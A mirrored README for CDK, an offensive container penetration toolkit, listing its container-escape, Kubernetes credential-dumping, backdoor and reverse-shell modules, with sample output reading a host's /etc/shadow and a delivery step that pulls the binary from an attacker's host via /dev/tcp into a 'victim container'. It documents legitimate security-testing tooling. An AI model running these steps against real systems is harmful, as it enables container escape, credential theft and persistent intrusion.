crash.software
Projects
Pull Requests
Issues
Builds
404StarLink
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY 404StarLink Files
🤬
master
ROOT /
detail /
CDK.md
255 lines | UTF-8 | 17 KB

CDK https://github.com/cdk-team/CDK

Language Author GitHub stars Version Time

CDK - Zero Dependency Container Penetration Toolkit

English | 简体中文

png

Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.

Quick Start

Run cdk eva to get evaluate info and a recommend exploit, then run cdk run to start the attack.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Installation/Delivery

Download latest release in https://github.com/cdk-team/CDK/releases/

Drop executable files into the target container and start testing.

TIPS: Deliver CDK into target container in real-world penetration testing

If you have an exploit that can upload a file, then you can upload CDK binary directly.

If you have a RCE exploit, but the target container has no curl or wget, you can use the following method to deliver CDK:

  1. First, host CDK binary on your host with public IP.
(on your host)
nc -lvp 999 < cdk
  1. Inside the victim container execute
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Auto Escape:
  cdk auto-escape <cmd>                     Escape container in different ways then let target execute <cmd>.

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.

Features

CDK has three modules:

  1. Evaluate: gather information inside container to find potential weakness.
  2. Exploit: for container escaping, persistance and lateral movement
  3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

This command will run the scripts below without local file scanning, using --full to enable all.

TacticsScriptSupportedUsage/Example
Information GatheringOS Basic Infolink
Information GatheringAvailable Capabilitieslink
Information GatheringAvailable Linux Commandslink
Information GatheringMountslink
Information GatheringNet Namespacelink
Information GatheringSensitive ENVlink
Information GatheringSensitive Processlink
Information GatheringSensitive Local Fileslink
Information GatheringKube-proxy Route Localnet(CVE-2020-8558)link
Information GatheringDNS-Based Service Discoverylink
DiscoveryK8s Api-server Infolink
DiscoveryK8s Service-account Infolink
DiscoveryCloud Provider Metadata APIlink

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]
TacticTechniqueCDK Exploit NameSupportedIn ThinDoc
Escapingdocker-runc CVE-2019-5736runc-pwn
Escapingcontainerd-shim CVE-2020-15257shim-pwnlink
Escapingdocker.sock PoC (DIND attack)docker-sock-checklink
Escapingdocker.sock RCEdocker-sock-pwnlink
EscapingDocker API(2375) RCEdocker-api-pwnlink
EscapingDevice Mount Escapingmount-disklink
EscapingLXCFS Escapinglxcfs-rwlink
EscapingCgroups Escapingmount-cgrouplink
EscapingAbuse Unprivileged User Namespace Escaping CVE-2022-0492abuse-unpriv-usernslink
EscapingProcfs Escapingmount-procfslink
EscapingPtrace Escaping PoCcheck-ptracelink
EscapingRewrite Cgroup(devices.allow)rewrite-cgroup-deviceslink
EscapingRead arbitrary file from host system (CAP_DAC_READ_SEARCH)cap-dac-read-searchlink
DiscoveryK8s Component Probeservice-probelink
DiscoveryDump Istio Sidecar Metaistio-checklink
DiscoveryDump K8s Pod Security Policiesk8s-psp-dumplink
Remote ControlReverse Shellreverse-shelllink
Remote ControlKubelet Execkubelet-exec
Credential AccessRegistry BruteForceregistry-brutelink
Credential AccessAccess Key Scanningak-leakagelink
Credential AccessEtcd Get K8s Tokenetcd-get-k8s-token
Credential AccessDump K8s Secretsk8s-secret-dumplink
Credential AccessDump K8s Configk8s-configmap-dumplink
Privilege EscalationK8s RBAC Bypassk8s-get-sa-tokenlink
PersistenceDeploy WebShellwebshell-deploylink
PersistenceDeploy Backdoor Podk8s-backdoor-daemonsetlink
PersistenceDeploy Shadow K8s api-serverk8s-shadow-apiserverlink
PersistenceK8s MITM Attack (CVE-2020-8554)k8s-mitm-clusteriplink
PersistenceDeploy K8s CronJobk8s-cronjoblink

Note about Thin: The thin release is prepared for short life container shells such as serverless functions. We add build tags in source code and cut a few exploits to get the binary lighter. The 2MB file contains 90% of CDK functions, also you can pick up useful exploits in CDK source code to build your own lightweight binary.

Tool Module

Running commands like in Linux, little different in input-args, see the usage link.

cdk nc [options]
cdk ps
CommandDescriptionSupportedUsage/Example
ncTCP Tunnellink
psProcess Informationlink
ifconfigNetwork Informationlink
viEdit Fileslink
ectlUnauthorized enumeration of ectd keys
kcurlRequest to K8s api-serverlink
dcurlRequest to Docker HTTP APIlink
ucurlRequest to Docker Unix Socketlink
rcurlRequest to Docker Registry API
probeIP/Port Scanninglink

项目相关

最近更新

[v1.5.2] - 2023-03-12

更新

  • 支持 linux 环境下的不同容器运行时,如 containerd、runc、docker
  • 修复shadow-apiserver匿名访问无效的issue,支持新版本的k8s,如 v1.23.1
  • 添加迭代部分功能的消息提醒

[v1.5.0] - 2022-09-25

更新

  • 检查内核漏洞利用,使用 mzet-/linux-exploit-suggester
  • 支持检查路径中的 setuid 文件
  • 为功能列表添加增加红色高亮输出
  • 支持两种新的格式化打印函数
  • 优化 CDK banner 高亮输出

[v1.4.0] - 2022-09-04

更新

  • 新增通过 cgroup release_agent 实现的 lxcfs-rw Exploit
  • 为 lxcfs-rw/lxcfs-rw-cgroup 添加推荐信息
  • 新增高亮显示所有的挂载信息

[v1.3.0] - 2022-07-10

Exploits

  • 为 ParseCDKMain 添加单元测试
  • 新增'Exploit container escape with kubelet log access & /var/log mount'
  • 新增 kubelet 默认未授权访问利用(端口10250)

Others

  • 在 github action 中新增了 go test
  • 支持 linux 容器获取网关
  • 更新文档,新增了 快速开始 章节
  • 新增在 pods 中获取网关

[v1.2.0] - 2022-06-25

更新

  • 新增 Exploit:从 etcd 获取 k8s 的 token
  • 添加输出结束消息
  • 移除 --insecure-port 参数
Please wait...
Page is in error, reload to recover